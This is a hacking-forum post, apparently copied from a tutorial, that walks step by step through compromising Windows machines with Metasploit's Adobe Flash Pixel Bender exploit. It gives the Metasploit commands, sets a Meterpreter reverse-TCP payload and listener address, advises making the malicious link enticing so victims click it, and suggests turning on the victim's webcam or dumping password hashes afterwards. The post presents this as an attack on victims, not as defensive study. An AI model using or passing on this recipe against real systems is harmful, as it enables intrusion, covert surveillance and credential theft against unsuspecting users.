VIPHACK SECURITY & COMMUNITY FORUM(Gh)


Join the forum, it's quick and easy

VIPHACK SECURITY & COMMUNITY FORUM(Gh)
VIPHACK SECURITY & COMMUNITY FORUM(Gh)
Would you like to react to this message? Create an account in a few clicks or log in to continue.
VIPHACK SECURITY & COMMUNITY FORUM(Gh)
Log in

I forgot my password



Top posting users this month
No user

Top posting users this week
No user

Latest topics
» Wifi password
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyMon Apr 04, 2016 10:57 am by jastis

» 6-Months Bitdefender Internet Security 2016 (PC Digital Download)
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptySun Nov 08, 2015 9:36 am by paulsaul

» COMPETITION FOR POSITION IN THE FORUM
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyWed Jul 22, 2015 11:14 am by paulsaul

» airtel free night browsing!!!!
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyWed May 13, 2015 5:20 pm by jack2danny

» crack bios password
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyTue Apr 28, 2015 1:50 pm by nana1926

» How to Hack into any Cyber Cafe System
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyTue Apr 28, 2015 1:43 pm by nana1926

» [HOW TO - Privacy] Find anyone who uses your WiFi without your consent
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyTue Apr 28, 2015 11:29 am by Tumtum

» Airtel Sika Kokoo Promo!
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyMon Apr 27, 2015 5:30 pm by Tumtum

» how to lock your Usb port
Hacking Windows (XP, Vista, 7, 8) Using Flash Player EmptyMon Apr 27, 2015 3:07 am by Tumtum

Who is online?
In total there is 1 user online :: 0 Registered, 0 Hidden and 1 Guest

None

[ View the whole list ]


Most users ever online was 119 on Fri Apr 09, 2021 6:03 am
Keywords

Member of the week



Member of The Week


You are not connected. Please login or register

Hacking Windows (XP, Vista, 7, 8) Using Flash Player

Go down  Message [Page 1 of 1]

Tumtum

Tumtum
ADMINISTRATOR
ADMINISTRATOR

In this tutorial, we will look at one way to hack Flash Player with Metasploit that works on nearly all Windows platforms, from XP up to Windows 8. This method will use a newer vulnerability that
Flash Player is such a fertile ground for vulnerabilities and exploits that it is worth your time and trouble to consider developing your own zero day exploit for this poorly designed and troubled application.

Step 1: Check for Vulnerabilities
Let's start by looking at the known vulnerabilities to the Adobe Flash Player by going to my favorite vulnerability database, Symantec's SecurityFocus, at the following link.

http://www.securityfocus.com/vulnerabilities

When you open up this URL, go to Vendor and select "Adobe" from the drop-down box, followed by "Flash Player" in the Title section. Leave the Version section untouched so that it provides us with Adobe Flash Player's vulnerabilities for all versions.
Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654
As you can see, Adobe Flash Player has 9 pages of vulnerabilities and 13 of the vulnerabilities have been revealed in just the last month. No matter how many times Adobe patches this application, the vulnerabilities never stop

Step 2: Fire Up Kali and Start Metasploit

Now that we know that Adobe Flash Player is fertile ground for us to hack, let's fire up Kali Linux and open Metasploit.Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654
Now, let's use the built-in search function in Metasploit to find Adobe exploits.
msf > search adobe

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654
As you can see, Metasploit has one called:

exploit/windows/browser/adobe_flash_pixel_bender_bof

This is a relatively new exploit, just having been released on April 28th, 2014. Let's use that one.

Step 3: Set the Options
To use this exploit, simply type:
msf > use exploit/windows/browser/abobe_flash_pixel_bender_bof

Now, let's take a look at this exploit by using the "info" command.
msf > info

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654
Note that this exploit will work on all operating systems from Windows XP to Windows 8 with Internet Explorer 6 through 11 with Flash 11, 12, and 13. That is a whole lot of vulnerable systems!

Before we start our exploit, let's check to see what options we need to set.
msf > show options

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654

As you can see in the screenshot above, this exploit has numerous options, but all of them are already set with default values.

The two you may want to change (but are not required) are the SVRPORT (8080) and the URIPATH. Note that if you do not change the URIPATH, it will be set using your IP address and a random string. If you are looking to entice someone to click on this link, you may want to make the URI more enticing.

Step 4: Set the Payload

Now, we need to set the payload that we want to deliver to the victim system. Ideally, we always want to deliver the meterpreter, if we can. Some exploits will allow us to deliver the meterpreter and others will not. In this case, we can deliver the meterpreter, so let's go for it!
msf > set PAYLOAD windows/meterpreter/reverse_tcp

Now, set the local host IP (LHOST).

set LHOST 192.168.147.129

Step 5: Exploit

Running this exploit is clean and simple. Just type "exploit" and it creates and starts a web server and a path to the malicious code that will exploit Adobe's Flash Player.

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654

Step 6: Navigate to the Web Server from a Windows Machine
Now, let's go over to our Windows 7 machine and enter the URL of our malicious web server that we built in Metasploit.

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654

While we are doing that, we can see in Metasploit that things are stirring. A connection is being established netween the Windows 7 and our Kali system running Metasploit.

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654

If we are patient, we will be rewarded with a meterpreter command on the Windows 7 system

Hacking Windows (XP, Vista, 7, 8) Using Flash Player Hack-like-pro-hacking-windows-xp-through-windows-8-using-adobe-flash-player.w654

Congrats! You own that system.

Step 7: Meterpreter

With the meterpreter on the victim system, we now have the ability and option to run any of the meterpreter scripts that I've listed here on Null Byte for you. For instance, you can turn on the webcam with webcam.rb or grab the password hashes with hashdump.rb.


http://viphack.omgforum.net

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum